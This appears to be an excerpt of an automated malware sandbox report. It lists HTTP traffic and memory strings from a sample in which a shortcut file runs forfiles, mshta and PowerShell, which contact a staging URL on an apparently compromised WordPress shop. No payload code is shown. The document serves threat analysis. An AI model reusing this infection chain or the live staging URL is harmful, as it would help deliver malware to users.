Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/front.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.17.5 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/husky.js?ver=1.3.4.2 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7 HTTP/1.1Accept: */*Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gurt.duna.uaConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: gurt.duna.ua
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 27 Oct 2024 06:35:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closelink: <https://gurt.duna.ua/wp-json/>; rel="https://api.w.org/"x-turbo-charged-by: LiteSpeedx-ray: wnp447:0.300/wn447:0.250/wo447X-Page-Speed: onCache-Control: max-age=0, no-cache
Source: select_radio_check[1].css.4.drString found in binary or memory: http://codepen.io/elmahdim/pen/hlmri
Source: svchost.exe, 00000007.00000002.3290543621.0000021325000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: chosen.min[1].css.4.drString found in binary or memory: http://getharvest.com
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/114
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/intersection-observer-polyfill
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000007.00000003.2255431582.0000021324D40000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: chosen.min[1].css.4.drString found in binary or memory: https://github.com/harvesthq/chosen
Source: chosen.min[1].css.4.drString found in binary or memory: https://github.com/harvesthq/chosen/blob/master/LICENSE.md
Source: mshta.exe, 00000004.00000003.2148804238.00000134703B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148804238.00000134703AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.du
Source: mshta.exe, 00000004.00000003.2148804238.00000134703B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148804238.00000134703AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.dua/pr
Source: mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.dun
Source: mshta.exe, 00000004.00000002.3290715017.0000013470449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/#website
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/?s=
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/cart/
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/comments/feed/
Source: mshta.exe, 00000004.00000002.3291302874.00000134705F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/comments/feed/G
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/dohovir-oferty/
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/feed/
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/help/
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-account/
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-account/edit-account/
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-account/lost-password/
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-account/orders/
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/my-discounts/
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/order-table/
Source: mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmp, sbOq2d6k2t.lnkString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
Source: mshta.exe, 00000004.00000003.2148626688.0000013470393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5#F9p4
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5#_?p4
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5#p?p4
Source: powershell.exeString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5$global:?
Source: mshta.exe, 00000004.00000003.2148398104.0000013470401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5)
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5...
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5...Jxs
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5...hx
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5...ly
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage50
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage54v%
Source: forfiles.exe, 00000000.00000002.2072042002.000001CF86BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage57E
Source: mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage58x;p4
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5:
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5;
Source: forfiles.exe, 00000000.00000002.2072042002.000001CF86BE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E0A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5C:
Source: mshta.exe, 00000004.00000003.2148626688.0000013470397000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Cy9p4
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5E
Source: mshta.exe, 00000004.00000002.3289411805.0000012C6F980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5H
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Lv
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Lw
Source: mshta.exe, 00000004.00000002.3289845446.000001346FEE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5P
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Tv
Source: mshta.exe, 00000004.00000003.2284096124.000001347038D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5U
Source: mshta.exe, 00000004.00000003.2148398104.0000013470404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5UN
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Y
Source: mshta.exe, 00000004.00000002.3289028213.0000012C6E070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5_STRING
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5dv
Source: mshta.exe, 00000004.00000002.3291040038.0000013470535000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5https://gurt.duna.ua/programy-nauczania/GT
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5i
Source: mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5j
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5kies
Source: mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5lw
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5n
Source: mshta.exe, 00000004.00000003.2284096124.000001347038D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5o
Source: mshta.exe, 00000004.00000003.2148626688.0000013470399000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5p
Source: mshta.exe, 00000004.00000003.2284096124.000001347040D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5q
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5tory.IE5ntJ
Source: mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5tw
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5u
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/ru/optovaia-prodazha-duna/
Source: mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/shop/
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-admin/admin-ajax.p
Source: mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290715017.0000013470449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-admin/admin-ajax.php
Source: mshta.exe, 00000004.00000002.3291040038.000001347053D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-admin/admin-ajax.phpuX
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-admin/js/password-strength-meter.min.js?ver=6.1.3
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-co
Source: mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnI
Source: mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnI.nav-pagination
Source: mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFU0UzdYPFkaVNA6w.woff)
